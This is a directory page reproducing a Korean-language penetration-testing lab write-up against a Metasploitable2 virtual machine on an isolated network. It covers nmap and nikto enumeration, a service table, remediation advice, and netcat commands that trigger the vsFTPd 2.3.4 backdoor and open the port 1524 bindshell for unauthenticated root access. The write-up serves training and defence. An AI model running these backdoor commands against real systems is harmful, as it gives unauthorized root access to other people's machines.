Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
pentest-lab-metasploitable2 — 격리된 네트워크의 pentest 실습실: nmap/nikto를 이용한 열거 및 Metasploitable2의 수동 익스플로잇(vsFTPd 백도어 CVE-2011-2523, bindshell)과 완전한 기술 보고서. | Kitploit
도구/GitHubGitHub/danreis20/pentest-lab-metasploitable2
ReconnaissanceWeb Vulnerability ScannersNetwork MappingVulnerability AnalysisExploitationCTFPenetration TestingPapers & ResearchLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Labs & Practice
GitHubdanreis20/pentest-lab-metasploitable2

pentest-lab-metasploitable2

격리된 네트워크의 pentest 실습실: nmap/nikto를 이용한 열거 및 Metasploitable2의 수동 익스플로잇(vsFTPd 백도어 CVE-2011-2523, bindshell)과 완전한 기술 보고서.

저장소 보기
19시간 17분 전아직 검토되지 않음

격리된 네트워크에서의 침투 테스트 실습실

저자: Daniel Stefan de Jesus dos Reis 날짜: 2026년 9월 환경: 격리된 가상 네트워크 pentestlab의 개인 KVM 실습실

범위 및 권한 고지

이 테스트는 전적으로 자체 소유의, 의도적으로 취약하게 만들어진 가상 머신을 대상으로 수행되었으며, 이 머신은 Rapid7이 공격 보안 교육 목적으로 특별히 배포한 것입니다. 또한 인터넷으로 나가는 경로가 없는 격리된 가상 네트워크 내에서 이루어졌습니다. 제3자의 시스템은 전혀 접근되지 않았습니다. 이 프로젝트는 침투 테스트 기술 개발을 위한 순수 교육 목적을 가집니다.

1. 실습실 아키텍처

  • 하이퍼바이저: KVM/libvirt
  • 가상 네트워크: pentestlab (브리지 virbr-lab), 서브넷 192.168.100.0/24, <forward>가 구성되지 않음 — 즉, 진정한 격리 네트워크입니다: VM들은 서로 그리고 호스트와 통신하지만, 실습실 외부로 나가는 경로가 없습니다. 네트워크 XML은 evidencias/pentestlab_network.xml에 있습니다.
  • 공격자 호스트: 호스트 머신 자체로, virbr-lab 인터페이스를 사용하며 nmap, nikto, gobuster, hydra, sqlmap, netcat을 사용합니다.
  • 대상: VM metasploitable2 (Metasploitable2, 수정된 Ubuntu 8.04), IP 192.168.100.90/24, 격리 네트워크 자체의 DHCP를 통해 할당됨.
root@kitploit:~
[ Host / Atacante ]  
        |
   virbr-lab (rede isolada, sem saída para internet)
        |
[ metasploitable2 ] 

2. 방법론

정찰 → 열거 → 익스플로잇 → 문서화의 기본 흐름을 따랐습니다:

  1. 호스트 탐색 및 서비스/버전 탐지를 포함한 전체 TCP 포트 스캔 (nmap -sV -sC -p-)
  2. 웹 취약점 스캔 (nikto)
  3. 식별된 버전과 연관된 알려진 취약점(CVE) 우선순위 지정
  4. 아래 모든 단계가 nc로 수동 수행된 수동 익스플로잇 — 단순히 "익스플로잇 실행"이 아니라 각 결함의 메커니즘을 이해하기 위함
  5. 증거 및 수정 권고 문서화

3. 정찰 — 전체 스캔

명령: nmap -sV -sC -p- -T4 192.168.100.90 전체 출력: evidencias/nmap_full_scan.txt

발견된 가장 관련성 높은 서비스 요약:

4. 익스플로잇된 취약점 (확인됨)

4.1 vsFTPd 2.3.4의 백도어 — CVE-2011-2523 (치명적)

2011년 6월 30일부터 2011년 7월 3일 사이에, 다운로드용으로 배포된 vsFTPd 2.3.4의 소스 코드가 공격자에 의해 변조되었습니다. 감염된 버전에는 백도어가 포함되어 있습니다: FTP 로그인의 사용자 필드에 :)로 끝나는 문자열이 들어오면, 서버는 아무런 인증 없이 TCP 포트 6200에 root 셸을 엽니다.

수행한 단계 (전체 로그는 evidencias/vsftpd_backdoor_exploit.txt):

root@kitploit:~
# 1. Disparar a backdoor enviando USER terminado em ":)"
( printf 'USER test:)\r\n'; sleep 1; printf 'PASS test\r\n'; sleep 2 ) | nc -w 5 192.168.100.90 21

# 2. Conectar na porta 6200, aberta pela backdoor
( printf 'whoami\n'; printf 'id\n'; printf 'uname -a\n'; sleep 2 ) | nc -w 5 192.168.100.90 6200

결과:

root@kitploit:~
uid=0(root) gid=0(root)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

인증 없이 완전한 root 접근을 획득했습니다.

4.2 1524/tcp 포트에 노출된 Bindshell (치명적)

nmap은 이미 이 서비스를 Metasploitable root shell로 식별합니다 — 이미지에 의도적으로 남겨진 백도어입니다 (훈련용 이미지에서 흔한 이전 익스플로잇의 잔재). 익스플로잇이 필요하지 않습니다: 연결만 하면 됩니다.

root@kitploit:~
( printf 'whoami\n'; printf 'id\n'; sleep 2 ) | nc -w 4 192.168.100.90 1524

결과: uid=0(root) gid=0(root) groups=0(root) — 즉시 root.

전체 로그는 evidencias/bindshell_1524.txt에 있습니다.

5. 식별된 취약점 (이번 라운드에서 익스플로잇되지 않음)

5.1 UnrealIRCd 3.2.8.1 — CVE-2010-2075 (치명적, 버전으로 식별됨)

6667/6697 포트에서 실행 중인 UnrealIRCd 버전은 역사적으로 백도어와 함께 배포된 빌드에 해당합니다 (AB; 명령 뒤에 셸 명령이 오는 형태). nc를 통해 수동으로 백도어를 발동시키려 시도했지만, 서버는 셸 명령을 실행하는 대신 입력을 유효하지 않은 IRC 명령(451 :You have not registered)으로 처리했습니다 — 이 특정 이미지에 트로이 목마화된 바이너리가 없거나, 페이로드가 이번 라운드에서 우선순위를 두지 않은 미세 조정을 필요로 하는 것입니다. 이를 확인된 취약점이 아니라 성공하지 못한 시도로 기록합니다.

5.2 distccd 3632/tcp — CVE-2004-2687 (높음)

연결하는 모든 클라이언트로부터 인증 없이 임의 명령을 받아들이는 분산 컴파일 서비스입니다. 버전으로 식별되었으며, 이번 라운드에서는 익스플로잇되지 않았습니다.

5.3 Java RMI Registry — 1099/tcp 포트 (높음)

역사적으로 역직렬화를 통한 원격 코드 실행에 취약합니다. 버전으로 식별되었으며, 이번 라운드에서는 익스플로잇되지 않았습니다.

6. 웹 열거 (nikto)

명령: nikto -h 192.168.100.90 -p 80 전체 출력: evidencias/nikto_scan.txt

주요 발견 사항:

  • Apache 2.2.8 구버전 (당시 최신 시리즈는 2.2.22+)
  • HTTP TRACE 메서드 활성화 (잠재적 XST)
  • /phpinfo.php 공개 노출 (PHP 구성 노출)
  • /phpMyAdmin/ IP 제한 없이 접근 가능
  • /doc/, /test/, /icons/에서 디렉터리 목록 표시 활성화
  • phpMyAdmin 쿠키가 httponly 플래그 없이 생성됨

7. 수정 권고

8. 이 실습실이 실제로 입증한 것

  • nmap을 사용한 네트워크 정찰 및 열거 (전체 스캔, 서비스/버전 탐지, NSE 스크립트)
  • 실제 백도어(vsFTPd)의 메커니즘 이해 및 자동화 프레임워크에 의존하지 않은 netcat을 통한 수동 익스플로잇
  • nikto를 사용한 웹 취약점 분석
  • 보고서 형식의 침투 테스트 문서화: 범위, 방법론, 심각도별 우선순위가 지정된 발견 사항, 수정 권고
  • 격리되고 안전한 실습 환경 유지 (인터넷으로 나가는 경로가 없는 가상 네트워크)

9. 다음 단계

  • 이 발견 사항을 마무리하기 위해 확실히 트로이 목마화된 이미지 버전으로 UnrealIRCd 익스플로잇 재시도
  • 호스트에서 직접 공격하는 대신 pentestlab 네트워크에 전용 두 번째 공격 머신(예: Kali Linux) 추가
  • 이 실습실을 Active Directory 시나리오로 확장 (별도로 계획된 프로젝트)
도구 다운로드
포트서비스버전비고
21/tcpFTPvsftpd 2.3.4익명 로그인 허용 + 알려진 백도어
22/tcpSSHOpenSSH 4.7p1구버전
23/tcpTelnetLinux telnetd평문 프로토콜
25/tcpSMTPPostfix—
80/tcpHTTPApache 2.2.8 + PHP 5.2.4phpMyAdmin 및 phpinfo.php 노출
139/445/tcpSMBSamba 3.0.20-Debian메시지 서명 비활성화
1099/tcpJava RMIGNU Classpath grmiregistry역사적으로 RCE에 취약
1524/tcpbindshell—인증 없이 이미 열려 있는 root 셸
3306/tcpMySQL5.0.51a-3ubuntu5—
3632/tcpdistccdv1역사적으로 RCE에 취약 (CVE-2004-2687)
5432/tcpPostgreSQL8.3.0–8.3.7—
5900/tcpVNC프로토콜 3.3—
6667/6697/tcpIRCUnrealIRCd 3.2.8.1알려진 백도어와 연관된 버전
8180/tcpHTTPApache Tomcat 5.5—
발견 사항권고
vsFTPd 2.3.4 백도어비공식/미검증 출처의 바이너리를 절대 사용하지 말 것; 설치 전 패키지 해시/서명 검증
1524 포트의 Bindshell정기적으로 열린 포트 감사 (주기적 내부 nmap); 문서화되지 않은 모든 셸은 사고로 간주
인증 없이 노출된 distccd방화벽을 통해 신뢰할 수 있는 호스트로 제한하거나, 분산 빌드에 적극적으로 사용되지 않는다면 비활성화
노출된 phpMyAdmin/phpinfo.phpIP/VPN으로 접근 제한, 관리 도구를 공개적으로 노출하지 말 것
구버전 Apache/PHP패치 관리 프로세스를 활성 상태로 유지
디렉터리 목록 표시 활성화Apache에서 Options Indexes 비활성화
메시지 서명이 비활성화된 SMBserver signing = mandatory 활성화